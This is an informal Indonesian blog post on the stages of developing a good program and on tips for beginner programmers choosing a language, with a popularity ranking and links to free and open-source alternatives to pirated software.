Untuk bisa menghasilkan program yang baik memerlukan analisis yang baik pula, baik itu analisis sistem, stuktur data maupun analisis requirement, selin itu juga dipelukan persiapan-persiapan yang matang. Hal ini berlaku bagi siapapun, bahkan seorang programmer professional sekalipun.  Sedangkan tahapan apas aja untuk membuat program yang baik akan saya jelaskan dibawah.
Program memang sudah menjadi kebutuhan pokok bagi masyarakat IT. karena segala sesuatu yang dilakukan di dalam IT pastilah memerlukan program. Program yang paling sederhana sekalipun setidaknya memiliki 3 bagian:
  1. Input – Masukan data.
  2. Proses – pemrosesan input.
  3. Output – keluaran program, kebutuhan yang kita harapkan.
Dalam membuat program, pemrograman adalah pokok dari proses pembuatan program itu sendiri namun pemrograman bergantung dari pemahaman persoalan, analisis sistem, perencanaan-perencanaan  dalam mendesain program itu sendiri.
Selain pemrograman hal yang utama harus dilakukan adalah merencanakan langkah-langkah yang harus diambil dalam menyelesaikan masalah. Karena dengan mengetahui masalah dan langkah-langkah penyelesaikan berarti kita sudah menyelesaikan program tersebut sebanyak 50% dari total pekerjaan, selanjutnya adalah teknis pembuatan itu sendiri yang di kenal dengan pemrograman/koding.Sebaliknya jika kita tidak bisa mengetahui masalah dan belum bisa membuat perencanaan berarti kita sudah merencanakan kegalan itu sendiri.
Dalam membuat sebuah program setidaknya ada beberapa hal yang perlu anda lakukan:
  1. Mendefinisikan Masalah/Defining the problem
    Masalah/Probem disini adalah kompenan apa saja yang diperlukan agar program ini jalan dikenal dengan masukan/inputnya apa saja, mendefinisikan apa yang nanti akan dilakukan oleh program dan bagaimana keluaran dari program yang kita harapkan nantinya. Pada tahap ini juga dikenal requirement analisis atau analisa kebutuhan.
  2. Perencanaan/Planning/Desain sistem
    Pada tahap ini adalah medefinisikan langkah-langkah apa saja yang dilakukan oleh program dalam menyelesaikan permasalahan yang ada. Bentuk dari perencanaan itu bisa berupa flowchart ataupun algoritma dari program, sehingga kita akan tahu proses apa saja yang ada dalam program tersebut. semakin detail flowchart  atau algoritma yang dibuat semakin mudah juga pada tahap implementasi/coding nantinya.
    Flowchart adalah suatu diagram menggunakan simbol-simbol khusus yang sudah menjadi standard internasional yang berisi langkah-langkah untuk menyelesaikan suatu masalah. sedangkan algoritma kbukan merupakan simbol tapi keterangan-keterangan yang sesuai dengan  keinginan kita, tidak ada standarnya. Oleh karena itu flowchart biasa juga disebut sebagai algoritma dalam bentuk simbol-simbol khusus yang dihubungkan dengan anak panah.
    Membuat flowchart terlebih dahulu akan lebih menghemat waktu daripada langsung melakukan coding sambil mencoba-coba. Kegiatan mencoba-coba akan menghabiskan waktu ketika implementasi/koding karena harus merubah koding yang lumayan banyak. Karena itu, biasakan membuat flowchart terlebih dahulu sebelum memecahkan suatu masalah.
  3. Implementasi/Koding/Programming
    Kini saatnya anda menulis program, tahap ini juga mencakup tahap perbaikan error dan testing. Menulis program dengan terstruktur dan sesuai dengan flowchart yang telah kita buat.
  4. Dokumentasi/Documentation
    Setelah tahap coding selesai, sangat disarankan bagi anda untuk membuat semacam dokumentasi. Tambahkan komentar-komentar pada program anda dan “bukukan” program yang akan anda buat. Hal ini akan bermanfaat jika anda sudah membuat program yang begitu banyak, dan suatu ketika nanti (mungkin bertahun-tahun kemudian) anda ingin mengambil sebagian dari code program anda yang lama untuk disisipkan pada program anda yang baru. Bayangkan jika anda tidak membuat dokumentasi, waktu anda akan sangat terbuang dengan menelusuri program-program lama anda satu-persatu.
  5. Testing
    • Unit Testing
      Menguji setiap unit dan modul yang terdapat dalam program tersebut
    • Integration Testing
      Menguji integrasi yang dilakukan kepada program seperti halnya ketika program tersebut sudah diinstall di client kita yang membutuhkan integrasi dengan sisitem yang lain seperti halnya integrasi dengan database.
    • Validation Testing
      menguji masukan yang diberikan kepada program. apapun masukannya program harus bisa menyelesaikan dengan baik.
    • Sistem Testing
      Pada tahap ini menguji permorfa dari program, apabila program dijalankan dengan kondisi-kondisi tertentu bagaimana?
  6. Operasional dan Maintenance
    Pada tahap ini sebenarnya bagaimana program yang telah kita buat dan testing ini bekerja sebagaimana mestinya, update program, menyeselaikan bug yang tidak ditemukan pada saat testing, serta pengembangan yang dapat dilakukan dengan program tersebut.
Setelah kita tahu bagaimana atau langkah -langkah dalam membuat program yang baik, alangkah sebaiknya dalam perencanaan sistem atau program tidak asal-asalan bahkan hanya menganggap seperti menggoreng tempe itu tadi, dibolak-balik matang, ingat Programmer juga manusia.. bukan robot yang sekali pencet bisa menyelesaikan masalah.

analisa programer

Tips untuk pemula yang ingin menjadi programmer

Saat ini banyak pemula yang mencari-cari bahasa pemrograman apa yang nantinya akan didalami olehnya, hal ini biasanya terjadi pada siswa/i SMU atau mahasiswa/i yang baru masuk Jurusan I.T , ada yang mencari informasi melalui majalah & tabloid computer, buku2 maupun melalui internet.Biasanya para pemula ini akan mengambil jalan pintas (dan benar) yaitu belajar Microsoft Visual Basic, selain lebih mudah di pelajari, banyak tersedia di toko2 buku, tempat untuk bertanya juga banyak dan yang paling penting adalah gampang mendapatkan CD nya… tentu CD bajakan nya, karena jarang (tidak ada) dari para pemula itu yang mau membelinya secara resmi. Bahkan sampai tingkat Mahasiswa/I pun sama… penyakit laten ini kelak akan berlanjut sampai saat kerja karena banyak (walau tidak semua) perusahaan di Indonesia yang memakai CD bajakan.


Trend bahasa pemrograman yang mereka pelajari saat itu belum tentu akan menjadi trend dimasa depan, tapi itulah tantangan bagi para “programmer” untuk terus belajar, belajar dan terus belajar mengikuti perkembangan dunia I.T yang tak ada matinya.Bahasa Mesin yang ribet seperti Assembler digantikan oleh Bahasa Basic, Bahasa Basic yang amburadul digantikan oleh Bahasa Pemrograman Procedural, Functional & Modular seperti Pascal dst dst.. dan yang akhirnya kini trend tersebut mengacu kepada Bahasa Pemrograman Berbasis Objek atau Object Oriented Language (OOP).


Lalu apa benar OOP menguasai pangsa pasar dunia? dan apakah benar semua programmer wajib belajar OOP?Jawabannya iya dan tidak. Tentunya tergantung dari banyak hal, diantaranya adalah dimana dia bekerja, perusahaannya bergerak dibidang apa? Software house? atau Perusahaan umum yang programmer nya hanya butuh Visual Basic standard ? apakah cukup aplikasi Single User, client/cerver atau web? PHP? ASP? .net? dst..
Tapi apakah benar seorang programmer hanya bekerja ( + belajar ) sesuai kebutuhan kantor? Apakah tidak ada niat mengembangkan diri? “Susah mas.. di kantor saya gak ada internet..” atau “Kantor saya pelit Mas.. beli buku aja gak mau, majalah computer aja gak mau langganan..” atau lebih parah lagi “Payah mas.. CD nya aja modal sendiri.. kantor gak mau beli..”. Atau ada juga yang berkata “Percuma.. belajar capek-capek gak ada implementasinya.. proyek sepi..”Bagi kita yang mau mengembangkan diri tentu tak ada batasan untuk terus “ngoprek” baik dikantor maupun dirumah.. langganan majalah atau tabloid computer, ke warnet browsing.. googling informasi terbaru, ikut komunitas bla blabla.Kalau kembali ke trend bahasa pemrograman apa yang akan kita dalami, ada baiknya (mungkin juga benar) kita pelajari bahasa pemrograman yang paling terakhir tentunya.. walau mungkin susah.. yah.. apa bpleh buat, namanya juga korban trend.

Mengacu kepada informasi terakhir index bulan April dari Situs Tiobe, bahasa pemrograman yang paling digemari adalah :

Urutan Bahasa Group
  1. Java SUN + Multi
  2. C Multi
  3. C++ Multi
  4. PHP PHP dan turunannya
  5. VB Basic, VB.NET, Visual Basic.NET, Visual Basic 2008 dll.
  6. Python Python, Jython, IronPython, pypy
  7. C# C#, C-Sharp, C Sharp, CSharp, CSharp.NET, C#.NET, C# 1.0 dll.
  8. Javascript JavaScript, JScript, ECMAScript
  9. PERL Perl, Pugs, PGE, rakudo
  10. Ruby Ruby, JRuby, MetaRuby, Rubinius, YARV, Ruby.NET dll.
  11. Delphi Delphi (.NET) & Kylix, Object Pascal, Free Pascal, Chrom dll.
  12. PL/SQL Oracle
  13. D Exception: 3-D Programming, DTrace
  14. SAS
  15. Pascal Borland Pascal, FPC
  16. Logo
  17. ABAP
  18. RPG
  19. LUA
  20. MatLAB
Dan informasi Bahasa Pemrograman yang paling digemari tahun sebelumnya adalah :
2003 C++.
2004 PHP
2005 Java
2006 Ruby
2007 Python
2008 C


Dari tabel diatas terlihat bahwa Bahasa Pemrograman OOP lebih mayoritas dibanding Non OOP, dan Bahasa berbasis Web (murni) lebih sedikit walaupun saat ini mulai dikembangkan aplikasi multi output bisa ke Web dan bisa pula Client/Server.

Satu hal yang menarik yaitu Bahasa Pascal masih berjaya di dunia pemrograman, mengingat Pascal sudah memasuki 4 dasawarsa masih banyak pemakainya, serta pendatang baru yang belum popular di Indonesia Bahasa LUA.

Pada table juga terlihat bahwa Visual Basic walau dengan segerombolan versinya hanya mampu menduduki peringkat ke 5, bandingkan dengan Bahasa C, walaupun sudah didaur-ulang berkali-kali menjadi JAVA(1), C++ (3) dan C# (7) masih mampu bercokol di posisi ke 2, bahkan turunan “gak resmi” nya pun PHP mampu bertengger diposisi ke 4.

Hal tersebut sangat jelas dan gampang dimengerti? Secara teori (walau pada kenyataannya susah) kalau kita belajar Bahasa C, maka bahasa turunan nya pun akan gampang kita pelajari ( masa sih gampang? Bullshit.. ). Belajar aja sendiri buktikan !

Satu lagi sebagai tambahan,bahwa informasi dari table diatas tersebut tentu tidak (belum tentu) relevan kalau di terapkan di Indonesia. Di Negara yang pembajak software ini terjadi kecenderungan (walau belum terbukti) bahwa kalau mau aman belajar bahasa pemrograman ya belajar saja VB ( +VB .net) !... alasannya sudah saya jelaskan sebelumnya.

Dan satu hal yang pasti adalah banyak perusahaan di Indonesia mempergunakan bahas Visual Basic dikantor mereka. Lihat saja di Koran-koan bahwa 70% lowongan pekerjaan programmer di kantor2 membutuhkan programmer VB (+ VB.net).

Uuupss… jangan senang dulu.. kalau anda melamar pada perusahaan tersebut maka saingan andapun akan antri sepanjang 1 Kilometer, karena sedemikian buuuaaanyaaak penggunanya.. jadi wajarlah bila saingan anda mencari kerja juga suuuaaangaaat buuuaaanyaaak. Jadi pilihlah Bahasa Pemrograman lain sebagai alternative ke 2 atau 3 (kalau kuat) untuk anda kuasai, misalnya C, Delphi atau Java untuk aplikasi client/server dan ASP, PHP untuk yang bebasis web.Sudah cukup? Belum..!Anda juga harus kuasai konsep database.. yah minimal mampu mendesain database untuk aplikasi yang anda buat sendiri.

Database apa sebaiknya yang harus saya kuasai?Kalau mengacu kepada tulisan sebelumnya, bila anda belajar dari produk Microsoft maka otomatis anda akan mempergunakan Microsoft Access atau MS SQL Server.Kalau mau lebih ada tantangan, pergunakan MySQL atau Postgre.. atau Firebird.

Apa benar saya harus beli CD bajakan? hemmm.. sebaiknya jangan, karena saat ini sudah banyak versi gratis dari aplikasi2 tersebut, misalnya untuk produk Microsoft sudah ada versi gratisnya yaitu Express Edition yang mencakup VB 2008 Express, VC++ 200 Express, VC# 2008 Express dan Visual Web Develpoer 2008, dan untuk databasenya anda dapat mempergunakan SQL Server 2008 Express, untuk informasi lebih lengkap silahkan kunjungi http://www.microsoft.com/express/product/default.aspx .Untuk penggemar produk Borland (sekarang menjadi milik Embarcadero) silahkan kunjungi http://www.turboexplorer.com/ , anda akan mendapatkan Turbo Delphi, Turbo C++, Turbo Ruby dan Turbo JBuilder, dan untuk mendapatkan database gratisnya silahkan kunjungi https://downloads.embarcadero.com/free/interbase.Versi2 gratis tersebut mempunyai keterbatasan dibanding versi komersialnya, tapi bagi anda sebagai pemula tentu sudah cukup dengan fitur2 yang ada.. nanti kalau sudah “jago”.. beli versi lisensinya ya…

Informasi tambahan lainnya bila anda ingin mencari versi gratis untuk aplikasi Office silahkan kunjungi http://download.openoffice.org/ atau http://id.openoffice.org/ anda dapat mengunduh produk OpenSource yang setara kemampuannya dengan MS Office.

Produk OpenSource lainnya yang dapat anda pertimbangkan antara lain adalah :
Mozilla Fiefox ( Web Browser) dan Mozilla Thunderbird (Email client)
Gaim (multi instant messenger)
ClamWin (Antivirus)
VLC Media Player (audio / video player)
GIMP (GNU Image Manipulation Program)
Bittorrent (P2), MediaWiki, Xvid, PBB, Outfoxed, dyne: bolic, GIMP dll.

Bagi yang mencari alternatif Visual Basic silahkan kunjungi http://gambas.sourceforge.net/, untuk alternatif Turbo Pascal silahkan ke http://www.freepascal.org/ dan alternatif Delphi silahkan lihat http://www.lazarus.freepascal.org/index.php, yang mencari alternatif Ms .net silahkan lihat http://mono-project.com/Main_Page.

Kalau Visio ada ? silahkan kunjungi http://www.osalt.com/visio anda akan mendapatkan beberapa produk alternative Visio OpenSource.Jadi kalau (mau) sedikit lebih kreatif kita tidak perlu membajak.. kecuali kepepet : ) tidak ada alternatif lain sama sekali.

Bagi yang ingin mendapatkan informasi lebih jauh mengenai software/aplikasi OpenSource silahkan kunjungi http://sourceforge.net/ atau http://freshmeat.net/, ingat.. url ke 2 nya bukan .com tapi .net.

Apa itu Client/Server? .net? GNU? OpenSource? Tunggu tulisan saya berikutnya.
Semoga tulisan ringan ini bisa menambah informasi buat semuanya yang akan mendalami dunia IT nantinya.